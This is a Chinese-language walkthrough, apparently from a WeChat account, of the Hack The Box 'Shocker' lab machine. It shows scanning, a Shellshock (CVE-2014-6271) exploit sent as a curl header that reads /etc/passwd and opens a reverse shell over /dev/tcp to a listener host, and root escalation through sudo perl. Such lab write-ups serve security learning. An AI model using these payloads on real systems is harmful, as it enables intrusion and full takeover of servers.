0x01 信息收集与探索
使用Nmap对靶机地址进行端口嗅探,发现其开放80、2222端口,操作系统为Linux。
使用searchsploit对SSH版本进行漏洞发现,发现存在用户名枚举漏洞,使用MSF模块进行枚举,直到获取flag都未能枚举出用户信息。
查看Web服务,为显示“Don't Bug Me”的静态页面。
使用Dirb对http://10.129.104.94/进行目录扫描,仅发现以下三个结果,其中http://10.129.104.94/cgi-bin/为403的目录。
搜索cgi-bin相关漏洞,未发现可以利用的漏洞。百度发现以下信息。
cgi-bin
CGI程序不能放在任意的目录下,只能放在CGI-BIN目录下。有的虚拟主机系统只提供一个公用的CGI-BIN目录,放置一些常用 的CGI程序供虚拟主机用户使用,这对用户不够方便,因为用户经常需要放置自己编制的CGI程序。
CGI程序在linux和windows操作系统上都能运行。这些程序一般要放在服务器上(比如tomcat、busybox等),远程访问服务器时,这些程序会自动运行。
最终对cgi-bin/目录进行目录扫描,发现存在user.sh文件,下载后查看,他是一个测试脚本,返回了测试时间且为下载请求时的时间。确定其是一个可运行的sh脚本。
尝试进行破壳漏洞验证,正常返回/etc/passwd文件信息,说明靶机存在破壳漏洞。
curl -H 'x: () { :;}; a=`/bin/cat /etc/passwd`; echo $a' 'http://10.129.104.94/cgi-bin/user.sh' -I
0x02 权限获取
利用破壳漏洞进行反弹shell。
curl -H 'x: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1' 'http://10.129.104.94/cgi-bin/user.sh' -I
NC监听4444端口,收到shell。
获取user.txt。
0x03 权限提升
执行sudo -l命令,发现/usr/bin/perl具备root免密执行权限,下一步利用perl进行提权操作。
sudo /usr/bin/perl -e "exec('/bin/sh')
获取root.txt。
sudo -l提权方式是Hack The Box里面非常经典的提权方式之一。
0x04 攻击路径
0x05 知识点汇总
5.1 CVE-2014-6271 “破壳“ 漏洞
CVE-2014-6271(即“破壳”漏洞)广泛存在与GNU Bash 版本小于等于4.3的*inux的系统之中,只要目标服务器开放着与Bash相交互的应用与服务,就有可能成功触发漏洞,获取目标系统当前Bash运行用户相同权限的shell接口。
在Shocker靶场中,通过目录扫描发现10.129.104.94/cgi-bin/user.sh地址,查看user.sh,它是一个测试脚本,并可以随时返回测试时间,该脚本即符合与Bash相交互的应用与服务。
5.1.1 漏洞验证
env x='() { :;}; echo vulnerable' /bin/bash –c "echo This is a test"5.1.2漏洞利用
# 验证curl -H 'x: () { :;}; a=`/bin/cat /etc/passwd`; echo $a' 'http://10.129.104.94/cgi-bin/user.sh' -I# 反弹curl -H 'x: () { :;}; /bin/bash -i >& /dev/tcp/10.10.14.4/4444 0>&1' 'http://10.129.104.94/cgi-bin/user.sh' -I
原文始发于微信公众号(Matrix1024):HTB靶场系列之Shocker通关攻略
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论